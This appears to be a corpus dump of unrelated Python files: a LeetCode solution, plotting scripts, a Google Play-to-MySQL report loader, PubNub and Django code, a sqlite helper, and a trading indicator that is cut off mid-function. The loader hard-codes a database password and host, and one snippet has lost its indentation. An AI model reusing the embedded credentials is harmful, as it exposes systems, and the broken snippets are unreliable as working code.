Return the maximum possible average pass ratio after assigning the extraStudents students. Answers within 10-5 of the actual answer will be accepted.
"""
class Solution:
    def maxAverageRatio(self, classes, extraStudents):
        """Assign each extra (always-passing) student to the class whose pass
        ratio improves the most, then return the average pass ratio.

        BUG FIX: the original keyed classes by their current ratio in a dict
        (two classes with equal ratios collide, silently losing one) and
        always boosted the *lowest-ratio* class.  The correct greedy
        criterion is the largest marginal gain (p+1)/(t+1) - p/t; on the
        problem's first example the old code returned ~0.7778 instead of the
        optimal ~0.78333.  A max-heap on the gain fixes both issues and runs
        in O((n + extraStudents) log n).
        """
        import heapq

        def gain(passed, total):
            # Improvement in this class's ratio from one more passing student.
            return (passed + 1) / (total + 1) - passed / total

        # heapq is a min-heap, so push negated gains to pop the max gain.
        heap = [(-gain(p, t), p, t) for p, t in classes]
        heapq.heapify(heap)
        for _ in range(extraStudents):
            _, p, t = heapq.heappop(heap)
            p, t = p + 1, t + 1
            heapq.heappush(heap, (-gain(p, t), p, t))
        return sum(p / t for _, p, t in heap) / len(heap)
if __name__ == "__main__":
    # Manual check with the problem's first example (expected ~0.78333).
    s = Solution()
    print(s.maxAverageRatio([[1,2],[3,5],[2,2]], 2))
    #print(s.maxAverageRatio([[2,4],[3,9],[4,5],[2,10]], 3))
|
17,021 | e368bff8795aba317cbcfceacefd294264f3c6e9 | #%%
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from agent import Agent
#%% Q-table
# Plot max Q for each position
q = np.load('qtables/agent1.npy')
q = np.max(q, axis=2)
fig, ax = plt.subplots(1, 1)
sns.heatmap(np.flip(q, 1).transpose(), annot=True)
plt.show()
#%% Best move
q = np.load('qtables/agent1.npy')
m = np.argmax(q, 2)
m = np.flip(m, 1).transpose()
d = np.full(m.shape, ' ', dtype='<U2')
for i in range(m.shape[0]):
for j in range(m.shape[1]):
d[i, j] = Agent.mov2dir[m[i, j]].rjust(2)
print(d)
print(m)
#%% Position heat map
# Plot number of times each tile was visited
bhist = np.load('board_hist.npy')
fig, ax = plt.subplots(1, 1)
sns.heatmap(np.flip(bhist, 1).transpose(), annot=True)
ax.set_title(f'sum={bhist.sum()}')
plt.show()
#%% Learning history
# Number of steps required to reach the goal
hist = pd.read_csv('hist.csv')
hist = hist.rolling(25).mean()
plt.plot(hist['steps'])
plt.show()
#%%
|
17,022 | 956303d1b427a0771f717dd69241457eb23cdf20 | #!/usr/bin/python
#coding=utf-8
class Test():
    """Tiny demo class illustrating what ``self`` and ``self.__class__`` are."""

    def prt(self):
        # Echo the instance itself, then the class object it belongs to.
        print(self)
        print(self.__class__)
# Demo: instantiate and show the instance / class representations.
t=Test();
t.prt();
|
17,023 | e512a842799a0785c5a31ffa2b69460af33d6338 | import numpy as np
import matplotlib.pyplot as plt
def mergeA_with_average(lab_A, lab_B):
    """Read two result files and plot their value distributions as
    overlaid histograms.

    *lab_A* lines look like ``key value`` (space separated);
    *lab_B* lines look like ``key, value`` (comma+space separated).

    Fixes over the original: files are opened with ``with`` so handles are
    closed even when a line fails to parse; the never-used merged lists and
    numpy key arrays (``lab_a_list``, ``labaarray``, ...) are removed; the
    legend typo "Grpup A" is corrected.
    """
    laba_hash = {}
    labb_hash = {}

    with open(lab_A, "r") as laba_handler:
        for line in laba_handler:
            parts = line.split(" ")
            laba_hash[parts[0]] = float(parts[1].rstrip())

    with open(lab_B, "r") as labb_handler:
        for line in labb_handler:
            parts = line.split(", ")
            labb_hash[parts[0]] = float(parts[1].rstrip())

    # 125 bins over [0, 125]; group A opaque, group B translucent on top.
    bins = np.linspace(0, 125, num=125)
    plt.hist(laba_hash.values(), bins, alpha=1, edgecolor="white",
             color="red", label="Group A")
    plt.hist(labb_hash.values(), bins, alpha=0.5, edgecolor="white",
             color="blue", label="Group B")
    plt.yticks(range(0, 20, 3))
    plt.xticks(range(0, int(max(laba_hash.values())) + 1, 10))
    plt.xlabel("Value range")
    plt.ylabel("Count")
    plt.legend(loc='upper right')
    plt.show()
if __name__ == '__main__':
    # Plot the distributions from the two lab result files.
    mergeA_with_average("results_labA.dat", "results_labB.dat")
|
17,024 | 653bae7ee9ecf5a27c7194a1e81fa634d97844ae | # -*- coding: utf-8 -*-
import os
import c4d
import operator
class Utility(object):
    """Static helper routines for material and bitmap handling in Cinema 4D."""

    @staticmethod
    def __is_texture_relative(texture_path):
        """Return True when *texture_path* is a relative path with a directory part."""
        # A path with no directory component is just a bare file name.
        directory = os.path.split(texture_path)[0]
        if not directory:
            return False
        # Relative when it starts with '.', the OS separator, or '/'.
        first_char = texture_path[:1]
        return first_char == "." or first_char == os.path.sep or first_char == "/"

    @staticmethod
    def select_material(mats):
        """Add every material in *mats* to the active document's selection."""
        doc = c4d.documents.GetActiveDocument()
        for entry in mats:
            doc.SetActiveMaterial(entry["material"], c4d.SELECTION_ADD)
        # Notify Cinema 4D that the scene changed.
        c4d.EventAdd()

    @staticmethod
    def resize_bmp(bmp, x, y):
        """Return a bicubic-rescaled x-by-y copy of *bmp*; None passes through."""
        if bmp is None:
            return
        scaled = c4d.bitmaps.BaseBitmap()
        scaled.Init(x, y)
        bmp.ScaleBicubic(scaled, 0, 0, bmp.GetBw() - 1, bmp.GetBh() - 1,
                         0, 0, scaled.GetBw() - 1, scaled.GetBh() - 1)
        return scaled
|
17,025 | 4fa17fe040037a32fe8012f10646999eec392dc5 | # The function of this script is to use the Google Cloud API to download reports from the Google play store. This script will download the monthly reports
# that Google provides from the Google Play Store, then those csv's are parsed in order to grab relevent data, and then all of the relevent data
# that is to be put in the database is inserted into the operation database.
import io
from apiclient.http import MediaIoBaseDownload
import json
import csv
from httplib2 import Http
from oauth2client.service_account import ServiceAccountCredentials
from apiclient.discovery import build
import datetime
import os
import mysql.connector
import sys
# This method gets respective data (defined by type_data and year_month passed in) from the Google Cloud. Once it downloads that csv it will open the csv
# and get all of the data and return it as a dict keyed by the date. It then deletes the csv that it downloaded from Google Cloud.
def get_data(year_month, type_data ,subtype_data, json_file):
report_to_download = type_data + '_com.metropia.activities_' + year_month + subtype_data + '.csv' # path in google bucket to report
data_dict = {} # this is where all of the data will be returned
print type_data # for debugging/logging purposes
output_file_name = (type_data + subtype_data + '_' + year_month + '.csv').replace('/', '') # have to get rid of '/' beacuse can't have those in file name
try:
credentials = ServiceAccountCredentials.from_json_keyfile_name(json_file, 'https://www.googleapis.com/auth/devstorage.read_only')
except:
print 'Error occured while loading credentials from json_file. Most likely incorrect path. Path given is: %s' % json_file
sys.exit(1) # terminating with failure
storage = build('storage', 'v1', http=credentials.authorize(Http())) # creating storage object
result = storage.objects().get_media(bucket=cloud_storage_bucket, object=report_to_download) # gets payload data from Google Cloud
print 'creating %s' % output_file_name # for debugging/logging purposes
file_to_download = io.FileIO(output_file_name, mode='w') # initializes file_to_download so data can be written to a csv from bytes
downloader = MediaIoBaseDownload(file_to_download, result, chunksize=1024*1024) # defining the downlaoder
done = False # variable to see when download is done
while not done:
status, done = downloader.next_chunk() # goes through chunk by chunk until the entire file is downloaded, done will be set equal to true when the last chunk is downloaded
file_to_download.close() # once file is downloaded, we can close the FileIO
data_initial = open(output_file_name) # opens the recently downloaded file whose encoding is ISO-8859-1 (<-- not sure if relevant)
data = csv.reader((line.replace('\0','') for line in data_initial), delimiter=",") # ignores all null lines in CSV file (<-- not sure if necessary)
iter_data = iter(data) # in order to skip the headers, have to make an iterable and skip the first row
next(iter_data) # skipping the first row
for row in iter_data: # is going through all of the data
try:
data_dict[row[0]] = row[2:] # creating the dictionary
except IndexError, detail: # if it doesn't have all of the data in the specific date
continue
data_initial.close() # closing the file
print 'deleting %s' % output_file_name
os.remove(output_file_name) # deleting the file downlaoded from Google, because it was already parsed for all relevent data
return data_dict # returning the data
# This method takes in the lists of install, crash, and rating data and returns one list of all the data
# combined in the format we want. This makes it much easier to write the data into a csv and to write it to the
# database.
def combine_lists(install, crash, rating):
    """Merge per-date install, crash and rating data into combined rows.

    *rating* drives the iteration because it has an entry for every date
    (it always carries the total average rating). Dates that have no crash
    data get [0, 0] placeholders.

    :param install: dict date -> list of install metrics
    :param crash: dict date -> [crashes, anrs] (may be missing dates)
    :param rating: dict date -> list of rating metrics
    :returns: list of rows [install..., crashes, anrs, rating..., date]
    """
    total_data = []
    # FIX: .items() works on both Python 2 and 3; the old .iteritems()
    # call was Python-2-only.
    for date, rating_values in rating.items():
        # there aren't crashes everyday, so the crash dict may not have every date
        crash_values = crash[date] if date in crash else [0, 0]
        total_data.append(install[date] + crash_values + rating_values + [date])
    return total_data
# This method creates and returns a connection to the MySQL database logged in with Eddie's account.
def DB_connect():
    """Open and return a new mysql.connector connection to the 'ops' database.

    SECURITY NOTE(review): the credentials and host are hard-coded here;
    they should be moved to configuration or environment variables.
    """
    cnxn = mysql.connector.connect(user='eddie', password='eddie1234',
                                   host='192.168.1.95', port = 3306,
                                   database='ops')
    return cnxn
# This method writes the data to the output that we want. As of now it writes to the database table
# google_extra_store; each element of `data` is one 13-column row.
def write_to_output(data):
    """Insert the combined report rows into the google_extra_store table.

    :param data: iterable of 13-element rows
                 (installs, crashes, ratings, report date)
    """
    cnxn = DB_connect()  # connecting to the db
    cursor = cnxn.cursor()  # establishing a cursor
    table_name = 'google_extra_store'  # the name of the table it is writing to
    # Column list, qualified with the table name exactly as before.
    columns = ['CurrentDeviceInstalls', 'DailyDeviceInstalls', 'DailyDeviceUninstalls',
               'DailyDeviceUpgrades', 'CurrentUserInstalls', 'TotalUserInstalls',
               'DailyUserInstalls', 'DailyUserUninstalls', 'DailyCrashes', 'DailyANRs',
               'DailyAverageRating', 'TotalAverageRating', 'ReportDate']
    column_sql = ', '.join('%s.%s' % (table_name, c) for c in columns)
    # FIX: use a parameterized statement so the driver quotes/escapes every
    # value. The old string-formatted SQL broke on string values containing
    # quotes and was open to SQL injection.
    sql = 'insert into %s (%s) values (%s)' % (
        table_name, column_sql, ', '.join(['%s'] * len(columns)))
    try:
        for row in data:  # iterating through all of the data
            cursor.execute(sql, tuple(row[:13]))
            cnxn.commit()  # commit per row, matching the original behaviour
    finally:
        # FIX: always release the cursor and connection (they leaked before).
        cursor.close()
        cnxn.close()
# Returns the most recent ReportDate stored in google_extra_store, as a date object.
# This is necessary so no repeated data gets added to the db.
def get_last_update_time():
    """Return the latest ReportDate present in google_extra_store."""
    cnxn = DB_connect()  # connecting to the db
    cursor = cnxn.cursor()  # establishing a cursor
    table_name = 'google_extra_store'
    # ORDER BY ... DESC LIMIT 1 fetches only the newest row.
    sql_statement = 'select %s.ReportDate FROM %s order by %s.ReportDate desc LIMIT 1;' % (table_name, table_name, table_name)  # getting the latest date
    cursor.execute(sql_statement)  # executing the sql and storing the data
    data = cursor.fetchone()[0]  # getting the last date
    cursor.close()  # closing everything
    cnxn.close()
    return data  # returning the date object
# NOTE: this script is Python 2 (print statements, `except X, y` syntax above).
# It is meant to run once per month and pull the *previous* month's reports.
client_email = '587666638625-mv4u63duf2ge9eqlstgnonglifrt0e2c@developer.gserviceaccount.com' # client email which sends us reports
json_file = 'Google Play Analytics-a1233ad04d40.json' # json file in directory that grants us access to the service account service
cloud_storage_bucket = 'pubsite_prod_rev_06472528785143111333' # the bucket that contains our google cloud storage (where the reports are stored.)
current_date = datetime.date.today() # getting the current date
first_day = current_date.replace(day=1) # getting the first day of the current month
last_date = first_day - datetime.timedelta(days=1) # going to the previous day of the first month, which will be in the last month
last_month = str(last_date)[5:7] # getting the month of the last month (ISO date slice 'YYYY-MM-DD'[5:7])
last_year = str(last_date)[0:4] # getting the year of the last month (only would be different if it was december)
# this code is to be run every month. It is to get the last months data
# therefore the code will get the latest entry in the db and extract the month
# from that date object. Then, if the month in db is equal to the last month, then that
# means the code was already run this month and it has the most up to date data available
if get_last_update_time().month == int(last_month):
    print 'there is already up to date data in the db'
    print get_last_update_time()
    print last_month
    sys.exit(0) # terminates successfully
else:
    print 'data should be updated'
    install_data = get_data(last_year + last_month, 'stats/installs/installs' , '_overview', json_file) # gets raw data for installs
    crash_data = get_data(last_year + last_month, 'stats/crashes/crashes' , '_overview', json_file) # gets raw data for crashes
    rating_data = get_data(last_year + last_month, 'stats/ratings/ratings' , '_overview', json_file) # gets raw data for ratings
    for data, array in rating_data.iteritems(): # replacing all 'NA' with NULL in the rating data
        if array[0] == 'NA':
            array[0] = 'NULL'
    all_data = combine_lists(install_data, crash_data, rating_data) # combining all of the data into one list in order to write it to the csv (or db)
    write_to_output(all_data) # writing all of the data to a csv
from pubnub.pnconfiguration import PNConfiguration
from pubnub.enums import PNReconnectionPolicy
from pubnub.pubnub import PubNub
from pubnub.callbacks import SubscribeCallback
import logging
import configparser
import os
log = logging.getLogger(__name__)
class FeederPublisher(object):
    """Thin wrapper around the PubNub client for feeder update messages.

    PubNub keys are read from a feeder.ini file located next to this module.
    """

    def __init__(self, channel='feeder_update', listener_callback=None):
        self.pnconfig = PNConfiguration()
        config = configparser.ConfigParser()
        # feeder.ini lives alongside this source file.
        ini_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "feeder.ini")
        config.read(ini_path)
        self.pnconfig.subscribe_key = config["pubnub"]["subscribe_key"]
        self.pnconfig.publish_key = config["pubnub"]["publish_key"]
        self.pnconfig.reconnect_policy = PNReconnectionPolicy.LINEAR
        self.pubnub = PubNub(self.pnconfig)
        self.channel = channel
        if listener_callback:
            self.add_listener(listener_callback)

    def add_listener(self, listener_callback):
        """Attach a SubscribeCallback to the underlying PubNub client."""
        self.pubnub.add_listener(listener_callback)

    @staticmethod
    def publish_callback(result, status):
        """Log the outcome of an asynchronous publish."""
        log.debug("message sent. Result {}".format(result))
        if status.error:
            log.error("{} during message publish. {}".format(result, status.error_data.information))

    def publish(self, message):
        """Publish *message* asynchronously on the configured channel.

        FIX: `async` became a reserved keyword in Python 3.7, making the old
        `.async(...)` call a SyntaxError; the PubNub SDK renamed the method
        to `pn_async`.
        """
        self.pubnub.publish().channel(self.channel).message(message).pn_async(self.publish_callback)

    def subscribe(self, subscriber_channel):
        """Subscribe the client to *subscriber_channel*."""
        self.pubnub.subscribe().channels(subscriber_channel).execute()
class MySubscribeCallback(SubscribeCallback):
    """Debug listener that logs PubNub presence, status and message events."""

    def presence(self, pubnub, presence):
        log.debug("presence call {}".format(presence))

    def status(self, pubnub, status):
        log.debug("status called {}".format(status))

    def message(self, pubnub, message):
        # Log the whole message envelope (all attributes), not just the payload.
        log.info("incoming message: [{}]".format(vars(message)))
# Manual smoke test: publish a sample message with debug logging enabled.
if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)
    FeederPublisher().publish(["hello", "again"])
|
17,027 | fcb85c0dbcebafe1034aaf830e34fa6310d8ab7d | class FirstClass:
    def setdata(self,value1, value2):
        """Store the two given values on the instance as data1 and data2."""
        self.data1=value1
        self.data2=value2
    def display(self):
        """Print data1 and data2, separated and followed by newlines."""
        print(self.data1, '\n', self.data2, '\n')
# Demo: set attributes via the method, then directly, then attach a brand-new
# attribute (Python allows adding per-instance attributes at runtime).
x = FirstClass()
x.setdata("King Arthur", -5)
x.display()
x.data1="QQ"
x.data2=-3
x.display()
x.anothername="spam"
x.display()
print(x.anothername)
import openpyxl
# Create a workbook with one sheet and a six-column header row, then save it.
workbook = openpyxl.Workbook()
sheet = workbook.active
sheet.title = '蔡徐坤篮球'
# Write the header titles in row 1; a loop replaces the six copy-pasted
# sheet.cell(...) calls (same cells, same values).
headers = ['名称', '地址', '描述', '观看次数', '弹幕数', '发布时间']
for column, title in enumerate(headers, start=1):
    sheet.cell(row=1, column=column, value=title)
workbook.save('蔡徐坤篮球.xlsx')
|
# -*- coding: utf-8 -*-
# Django
from django.shortcuts import render
from django.contrib.auth.decorators import login_required, user_passes_test
from django.db.models import Count
from django.forms.models import model_to_dict
from django_filters import rest_framework as filters
# REST
from rest_framework import status
from rest_framework import viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework.decorators import api_view, renderer_classes
from rest_framework.renderers import JSONRenderer
# Tarteel
from evaluation.models import TajweedEvaluation, Evaluation
from evaluation.serializers import TajweedEvaluationSerializer, EvaluationSerializer
from restapi.models import AnnotatedRecording
from quran.models import Ayah, AyahWord, Translation
# Python
import io
import json
import os
import random
# =============================================== #
# Constant Global Definitions #
# =============================================== #
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# ===================================== #
# Utility Functions #
# ===================================== #
# TODO: Update to use Quran DB
def get_tajweed_rule(surah_num=0, ayah_num=0, random_rule=False):
    """If random_rule is true then we get a random tajweed rule. Otherwise returns a
    specific rule. Both options return the text and word index.

    :param surah_num: 1-indexed surah number (ignored when random_rule=True)
    :param ayah_num: 1-indexed ayah number (ignored when random_rule=True)
    :param random_rule: pick a random surah/ayah/rule instead
    :return: A tuple with the surah & ayah number, text, rule, and word position
    :rtype: tuple(int, int, str, str, int) or tuple(str, str, int)
    """
    # Rules and uthmani text are loaded fresh from JSON on every call.
    TAJWEED_FILE = os.path.join(BASE_DIR, 'utils/data-rules.json')
    with io.open(TAJWEED_FILE) as file:
        tajweed_rules = json.load(file)
        tajweed_rules = tajweed_rules['quran']
        file.close()  # redundant: the with-block already closes the file
    UTHMANI_FILE = os.path.join(BASE_DIR, 'utils/data-uthmani.json')
    with io.open(UTHMANI_FILE, 'r', encoding="utf-8-sig") as file:
        uthmani_q = json.load(file)
        uthmani_q = uthmani_q['quran']
        file.close()  # redundant: the with-block already closes the file
    if random_rule:
        random_surah = random.choice(tajweed_rules['surahs'])
        surah_num = random_surah['num']
        random_ayah = random.choice(random_surah['ayahs'])
        ayah_num = random_ayah['num']
        rule_dict = random.choice(random_ayah['rules'])
    else:
        # NOTE(review): this branch indexes tajweed_rules['surah'] while the
        # random branch uses 'surahs', and it does not descend into ['rules']
        # the way the random branch does — verify against the JSON schema.
        rule_dict = tajweed_rules['surah'][surah_num - 1]['ayahs'][ayah_num - 1]
    rule = rule_dict['rule']
    rule_start = rule_dict['start']
    rule_end = rule_dict['end']
    # 1-indexed
    ayah_text = uthmani_q['surahs'][surah_num - 1]['ayahs'][ayah_num - 1]['text']
    ayah_text_list = ayah_text.split(" ")
    # Walk the words accumulating character length until we pass the rule's
    # start offset; that word is the one carrying the rule.
    position = 0
    curr_word_ind = 0
    for i, word in enumerate(ayah_text_list):
        position += len(word)
        if position >= rule_start:
            curr_word_ind = i
            break
    if random_rule:
        return surah_num, ayah_num, ayah_text, rule, curr_word_ind
    return ayah_text, rule, curr_word_ind
def is_evaluator(user):
    """Return True when *user* is set and belongs to the 'evaluator' group."""
    return bool(user) and user.groups.filter(name='evaluator').exists()
# TODO: Deprecated
def get_low_evaluation_count():
    """Finds a recording with the lowest number of evaluations

    :returns: A random AnnotatedRecording object which has the minimum evaluations
    :rtype: AnnotatedRecording
    """
    # Annotate every recording with its evaluation count, then pick randomly
    # among those tied for the minimum count.
    recording_evals = AnnotatedRecording.objects.annotate(total=Count('evaluation'))
    recording_evals_dict = {entry : entry.total for entry in recording_evals}
    min_evals = min(recording_evals_dict.values())
    min_evals_recordings = [k for k, v in recording_evals_dict.items() if v==min_evals]
    return random.choice(min_evals_recordings)
def get_no_evaluation_recording(surah_num=None, ayah_num=None):
    """Pick a recording and package its ayah data for evaluation.

    NOTE(review): despite the old docstring, this does not pick the recording
    with the *fewest* evaluations — it picks a random one from the annotated
    queryset. The `total=Count('evaluation')` annotation is computed but never
    used for selection.

    :param surah_num: optional surah restriction (falls back to random if no
        recording exists for the requested surah/ayah)
    :param ayah_num: optional ayah restriction
    :returns: ayah dict with words, translations, audio_url and recording_id,
        or {'detail': ...} when no recordings exist at all
    :rtype: dict
    """
    # Get recordings with a file.
    if surah_num is not None and ayah_num is not None:
        recording_evals = AnnotatedRecording.objects.filter(
            surah_num=surah_num, ayah_num=ayah_num, file__gt='',
            file__isnull=False).annotate(total=Count('evaluation'))
        # If no recordings for that surah/ayah, fall through to a random one.
        try:
            random_recording = random.choice(recording_evals)
        except IndexError:
            surah_num = None
            ayah_num = None
    if surah_num is None and ayah_num is None:
        recording_evals = AnnotatedRecording.objects.filter(
            file__gt='', file__isnull=False).annotate(total=Count('evaluation'))
        try:
            random_recording = random.choice(recording_evals)
        except IndexError:
            error_str = "No more unevaluated recordings!"
            print(error_str)
            return {'detail': error_str}
    surah_num = random_recording.surah_num
    ayah_num = random_recording.ayah_num
    audio_url = random_recording.file.url
    recording_id = random_recording.id
    # Prep response
    ayah = Ayah.objects.get(chapter_id__number=surah_num, verse_number=ayah_num)
    ayah = model_to_dict(ayah)
    # Get all the words
    words = AyahWord.objects.filter(ayah__verse_number=ayah_num,
                                    ayah__chapter_id__number=surah_num)
    translations = Translation.objects.filter(ayah__verse_number=ayah_num,
                                              ayah__chapter_id__number=surah_num)
    # Convert to list of dicts; word order is reversed for display (RTL).
    ayah['words'] = list(reversed(words.values()))
    ayah['translations'] = list(translations.values())
    ayah["audio_url"] = audio_url
    ayah["recording_id"] = recording_id
    return ayah
# ============================= #
# API Views #
# ============================= #
class EvaluationFilter(filters.FilterSet):
    """Custom filter based on surah, ayah, evaluation type or recording."""
    EVAL_CHOICES = (
        ('correct', 'Correct'),
        ('incorrect', 'Incorrect')
    )
    # surah/ayah live on the related AnnotatedRecording, not on Evaluation.
    surah = filters.NumberFilter(field_name='associated_recording__surah_num')
    ayah = filters.NumberFilter(field_name='associated_recording__ayah_num')
    evaluation = filters.ChoiceFilter(choices=EVAL_CHOICES)
    associated_recording = filters.ModelChoiceFilter(
        queryset=AnnotatedRecording.objects.all())

    class Meta:
        model = Evaluation
        fields = ['surah', 'ayah', 'evaluation', 'associated_recording']
class EvaluationViewSet(viewsets.ModelViewSet):
    """CRUD API for Evaluation objects with query-parameter filtering.

    Example: v1/evaluations/?surah=114&ayah=1&evaluation=correct
    """
    serializer_class = EvaluationSerializer
    queryset = Evaluation.objects.all()
    filter_backends = (filters.DjangoFilterBackend,)
    filter_class = EvaluationFilter

    @action(detail=False, methods=['get'])
    def low_count(self, request):
        """Return a random recording (with ayah data) to evaluate.

        :returns: ayah payload from get_no_evaluation_recording()
        :rtype: Response
        """
        ayah = get_no_evaluation_recording()
        return Response(ayah)

    @low_count.mapping.post
    def low_count_specific(self, request):
        """Return a recording for the specific surah/ayah given in the body.

        Expects integer-convertible 'surah' and 'ayah' keys in request.data.
        :rtype: Response
        """
        surah_num = int(request.data['surah'])
        ayah_num = int(request.data['ayah'])
        ayah = get_no_evaluation_recording(surah_num=surah_num, ayah_num=ayah_num)
        return Response(ayah)
class TajweedEvaluationList(APIView):
    """API endpoint that allows tajweed evaluations to be posted or retrieved."""

    def get(self, request, format=None):
        """Return all tajweed evaluations, newest first."""
        evaluations = TajweedEvaluation.objects.all().order_by('-timestamp')
        tajweed_serializer = TajweedEvaluationSerializer(evaluations, many=True)
        return Response(tajweed_serializer.data)

    def post(self, request, *args, **kwargs):
        """Validate and store a new tajweed evaluation."""
        # NOTE(review): should use the logging module rather than print.
        print("EVALUATOR: Received a tajweed evaluation:\n{}".format(request.data))
        new_evaluation = TajweedEvaluationSerializer(data=request.data)
        # raise_exception=True makes is_valid() raise on invalid input, so the
        # final 400 return below is effectively unreachable.
        if new_evaluation.is_valid(raise_exception=True):
            new_evaluation.save()
            return Response(new_evaluation.data, status=status.HTTP_201_CREATED)
        return Response(new_evaluation.errors, status=status.HTTP_400_BAD_REQUEST)
# ===================================== #
# Static Page Views #
# ===================================== #
@api_view(('GET',))
@renderer_classes((JSONRenderer,))
def get_evaluations_count(request, format=None):
    """Return the total number of Evaluation rows as a JSON payload."""
    total = Evaluation.objects.all().count()
    return Response({"count": total})
@login_required
@user_passes_test(is_evaluator, login_url='/')
def tajweed_evaluator(request):
    """Returns a random ayah for an expert to evaluate for any mistakes.

    :param request: rest API request object.
    :type request: Request
    :return: Rendered view of evaluator page with form, ayah info, and URL.
    :rtype: HttpResponse
    """
    # User tracking - Ensure there is always a session key.
    if not request.session.session_key:
        request.session.create()
    session_key = request.session.session_key
    # Keep drawing random tajweed rules until at least one recording exists
    # for the chosen surah/ayah.
    recordings = None
    while not recordings:
        surah_num, ayah_num, ayah_text, rule, word_index = get_tajweed_rule(random_rule=True)
        recordings = AnnotatedRecording.objects.filter(file__gt='', file__isnull=False,
                                                       surah_num=surah_num,
                                                       ayah_num=ayah_num)
    random_recording = random.choice(recordings)
    # Neighbouring word indices for context; None at either boundary.
    prev_word_ind = word_index - 1 if word_index > 0 else None
    ayah_text_list = ayah_text.split(" ")
    next_word_ind = word_index + 1 if word_index + 1 < len(ayah_text_list) else None
    # Fields
    audio_url = random_recording.file.url
    recording_id = random_recording.id
    # Map the rule code to its human-readable label.
    category_dict = dict(TajweedEvaluation.CATEGORY_CHOICES)
    rule_text = category_dict[rule]
    return render(request, 'evaluation/tajweed_evaluator.html',
                  {'session_key': session_key,
                   'rule_text': rule_text,
                   'rule_id': rule,
                   'surah_num': surah_num,
                   'ayah_num': ayah_num,
                   'ayah_text': ayah_text_list,
                   'word_index': word_index,
                   'prev_word_index': prev_word_ind,
                   'next_word_index': next_word_ind,
                   'audio_url': audio_url,
                   'recording_id': recording_id})
|
from django.shortcuts import render_to_response, render
from worksheet.models.models import WorkSheet
# Create your views here.
def count(request):
    """Render the count page with empty client/type series."""
    context = {'client': [], 'type': []}
    return render(request, 'worksheet/count.html', context)
def count_result(request):
    """Render worksheet counts, optionally restricted to a date range.

    Query params ``startDate``/``endDate`` (both required together) bound the
    WorkSheet.time field; otherwise all worksheets are counted.
    The context 'client' list holds counts for client_type 1-5 and 'type'
    holds counts for sheet_type 1-11, in order.
    """
    start_date = request.GET.get('startDate', False)
    end_date = request.GET.get('endDate', False)
    if start_date and end_date:
        worksheets = WorkSheet.objects.filter(time__gte=start_date, time__lte=end_date)
    else:
        worksheets = WorkSheet.objects.all()
    # One filtered count per category; replaces the old copy-pasted
    # c1..c5 / t1..t11 blocks with identical queries in identical order.
    clients = [worksheets.filter(client_type=i).count() for i in range(1, 6)]
    types = [worksheets.filter(sheet_type=i).count() for i in range(1, 12)]
    return render_to_response('worksheet/count.html', {'client': clients, 'type': types})
'''
Created on 2017/01/31
@author: Brian
'''
import sqlite3
from os.path import isfile, getsize
defaultDatabase = "textToolStrings.db"
def create_table(db_path=None):
    """Create the textStrings table if it does not already exist.

    :param db_path: optional database path; defaults to the module-level
        defaultDatabase so existing zero-argument callers are unchanged.
    """
    conn = sqlite3.connect(db_path or defaultDatabase)
    try:
        # No explicit commit, matching the original behaviour; conn.execute
        # creates an implicit cursor for the single DDL statement.
        conn.execute('CREATE TABLE IF NOT EXISTS textStrings(strings TEXT)')
    finally:
        # FIX: always release the connection — the original leaked it if
        # execute() raised.
        conn.close()
def data_entry(stringValue, db_path=None):
    """Insert one string into the textStrings table.

    :param stringValue: the text to store
    :param db_path: optional database path; defaults to the module-level
        defaultDatabase so existing one-argument callers are unchanged.
    """
    conn = sqlite3.connect(db_path or defaultDatabase)
    try:
        # `with conn:` commits on success and rolls back on error, replacing
        # the explicit commit; the parameterized INSERT is kept as-is.
        with conn:
            conn.execute("INSERT INTO textStrings (strings) VALUES (?)", (stringValue,))
    finally:
        # FIX: always release the connection — the original leaked it if
        # execute() raised.
        conn.close()
|
# Python Program - Find ncR and nPr
import math

# Interactive script: read n and r, then print nCr and nPr.
print("Enter 'x' for exit.")
nval = input("Enter value of n: ")
if nval == 'x':
    exit()
else:
    rval = input("Enter value of r: ")
    n = int(nval)
    r = int(rval)
    # FIX: integer (floor) division keeps the results exact. The old float
    # division lost precision for large n and printed e.g. "120.0".
    npr = math.factorial(n) // math.factorial(n - r)
    ncr = npr // math.factorial(r)
    print("ncR =", ncr)
    print("nPr =", npr)
|
# Ch6Ex132.py
# Author: Parshwa Patil
# ThePythonWorkbook Solutions
# Exercise No. 132
# Title: Postal Codes
def postalCodeParser(code):
    """Print the province and urban/rural class for a Canadian postal code.

    Only the first two characters are inspected: the leading letter maps to a
    province, and a second character of '0' means a rural address.

    :param code: postal code, expected upper-case (caller upper-cases it)
    """
    # NOTE: 'Saskatchwan' spelling kept as-is to preserve output exactly.
    charToProvince = {'A': 'Newfoundland', 'B': 'Nova Scotia', 'C': 'Prince Edward Island', 'E': 'New Brunswick', 'G': 'Quebec', 'H': 'Quebec', 'J': 'Quebec', 'K': 'Ontario', 'L': 'Ontario', 'M': 'Ontario', 'N': 'Ontario', 'P': 'Ontario', 'R': 'Manitoba', 'S': 'Saskatchwan', 'T': 'Alberta', 'V': 'British Columbia', 'X': 'Nunavut or Northwest Territories', 'Y': 'Yukon'}
    # FIX: also reject codes that are too short or start with an unmapped
    # character — the original raised IndexError/KeyError on such input.
    if len(code) < 2 or code[0] not in charToProvince:
        print("Invalid Postal Code!")
        return
    prov = charToProvince[code[0]]
    addrType = 'a rural' if code[1] == '0' else 'an urban'
    print("%s is for %s address in %s" % (code, addrType, prov))
def main():
    """Prompt for a postal code and print its parsed description."""
    code = input("Enter Postal Code: ").upper()
    postalCodeParser(code)

if __name__ == "__main__": main()
from math import fabs
from typing import Union
import numpy as np
from numpy.lib.stride_tricks import sliding_window_view
from jesse.helpers import get_candle_source
from jesse.helpers import get_config
def fwma(candles: np.ndarray, period: int = 5, source_type: str = "close", sequential: bool = False) -> Union[
    float, np.ndarray]:
    """
    Fibonacci's Weighted Moving Average (FWMA)

    :param candles: np.ndarray
    :param period: int - default: 5
    :param source_type: str - default: "close"
    :param sequential: bool - default=False
    :return: float | np.ndarray
    """
    # Trim history to the configured warm-up window when only the latest
    # value is requested.
    warmup_candles_num = get_config('env.data.warmup_candles_num', 240)
    if not sequential and len(candles) > warmup_candles_num:
        candles = candles[-warmup_candles_num:]
    source = get_candle_source(candles, source_type=source_type)
